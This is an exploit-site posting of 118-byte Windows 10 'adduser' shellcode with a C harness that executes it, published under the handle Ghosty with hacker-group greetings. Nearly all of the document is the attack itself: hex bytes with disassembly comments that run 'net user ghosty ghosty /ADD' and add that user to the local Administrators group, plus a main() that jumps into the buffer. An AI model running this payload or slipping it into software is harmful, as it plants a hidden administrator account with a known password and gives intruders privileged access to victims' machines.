facebook facebook twitter rss

Windows10 adduser shellcode - (118 Bytes)

Author: Ghosty , Published: 26-11-2014
/*
▄██████▄ ▄█ █▄ ▄██████▄ ▄████████ ███ ▄██ ▄
███ ███ ███ ███ ███ ███ ███ ███ ▀█████████▄ ███ ██▄
███ █▀ ███ ███ ███ ███ ███ █▀ ▀███▀▀██ ███▄▄▄███
▄███ ▄███▄▄▄▄███▄▄ ███ ███ ███ ███ ▀ ▀▀▀▀▀▀███
▀▀███ ████▄ ▀▀███▀▀▀▀███▀ ███ ███ ▀███████████ ███ ▄██ ███
███ ███ ███ ███ ███ ███ ███ ███ ███ ███
███ ███ ███ ███ ███ ███ ▄█ ███ ███ ███ ███
████████▀ ███ █▀ ▀██████▀ ▄████████▀ ▄████▀ ▀█████▀
###
# Title : Windows10 adduser shellcode - (118 Bytes)
# Author : Ghosty
# E-mail : x31337666@gmail.com
# Home : Hydra (16040) - Algeria -(00551216458)
# Web Site : 127.0.0.1
# FaCeb0ok : http://fb.me/0x9h027
# Friendly Sites : www.exploit4arab.net * www.1337day.com
# Platform/CatID : Shellcode - Local - Win32
# Type : Shellcode - proof of concept - Windows
# Tested on : Windows10 Techincal Preview
###
*/ // This Will Add a User With Admin Previlege
// user:ghosty
// pass:ghosty
#include <stdio.h>
#include <string.h>
char msg[] =
"\xeb\x1b" // jmp 40101d <_start+0x1d>
"\x5b" // pop %ebx
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\x31\xc0" // xor %eax,%eax
"\x88\x43\x53" // mov %al,0x53(%ebx)
"\x53" // push %ebx
"\xbb\x70\x54\xc4\x76" // mov $0x76c45470,%ebx
"\xff\xd3" // call *%ebx
"\x31\xc0" // xor %eax,%eax
"\x50" // push %eax
"\xbb\x80\xdb\xc2\x76" // mov $0x76c2db80,%ebx
"\xff\xd3" // call *%ebx
"\xe8\xe0\xff\xff\xff" // call 401002 <_start+0x2>
"\x63\x6d\x64" // arpl %bp,0x64(%ebp)
"\x2e" // cs
"\x65" // gs
"\x78\x65" // js 40108e <__DTOR_LIST__+0x10>
"\x20\x2f" // and %ch,(%edi)
"\x63\x20" // arpl %sp,(%eax)
"\x6e" // outsb %ds:(%esi),(%dx)
"\x65" // gs
"\x74\x20" // je 401051 <_start+0x51>
"\x75\x73" // jne 4010a6 <__DTOR_LIST__+0x28>
"\x65" // gs
"\x72\x20" // jb 401056 <_start+0x56>
"\x67\x68\x6f\x73\x74\x79" //addr16 push $0x7974736f
"\x20\x67\x68" // and %ah,0x68(%edi)
"\x6f" // outsl %ds:(%esi),(%dx)
"\x73\x74" // jae 4010b6 <__DTOR_LIST__+0x38>
"\x79\x20" // jns 401064 <_start+0x64>
"\x2f" // das
"\x41" // inc %ecx
"\x44" // inc %esp
"\x44" // inc %esp
"\x20\x26" // and %ah,(%esi)
"\x26\x20\x6e\x65" // and %ch,%es:0x65(%esi)
"\x74\x20" // je 401070 <_start+0x70>
"\x6c" // insb (%dx),%es:(%edi)
"\x6f" // outsl %ds:(%esi),(%dx)
"\x63\x61\x6c" // arpl %sp,0x6c(%ecx)
"\x67\x72\x6f" // addr16 jb 4010c7 <__DTOR_LIST__+0x49>
"\x75\x70" // jne 4010ca <__DTOR_LIST__+0x4c>
"\x20\x41\x64" // and %al,0x64(%ecx)
"\x6d" // insl (%dx),%es:(%edi)
"\x69\x6e\x69\x73\x74\x72\x61" // imul $0x61727473,0x69(%esi),%ebp
"\x74\x6f" // je 4010d6 <__DTOR_LIST__+0x58>
"\x72\x73" // jb 4010dc <__DTOR_LIST__+0x5e>
"\x20\x2f" // and %ch,(%edi)
"\x41" // inc %ecx
"\x44" // inc %esp
"\x44" // inc %esp
"\x20\x67\x68" // and %ah,0x68(%edi)
"\x6f" // outsl %ds:(%esi),(%dx)
"\x73\x74" // jae 4010e8 <__DTOR_LIST__+0x6a>
"\x79\x4e"; // jns 4010c4 <__DTOR_LIST__+0x46>
int main()
{
int (*dz)() = (int(*)())msg;
printf("bytes: %u\n", strlen(msg));
dz();
}
/*================[ ShellCode By Ghosty * 1337dayAlgeria Community * ]=========================================
# Greetz To 1337dayAlgeria Community +> TrOoN, Caddy, KedAnz, Indoushkha, Chevr0sky, Kha&miX, KinG Of PiraTeS
# Greetz To Inj3ct0r Members 31337 +> KedAns * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * Angel Injection
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * All Security and Exploits Webs
#=============================================================================================================*/

Like us on Facebook :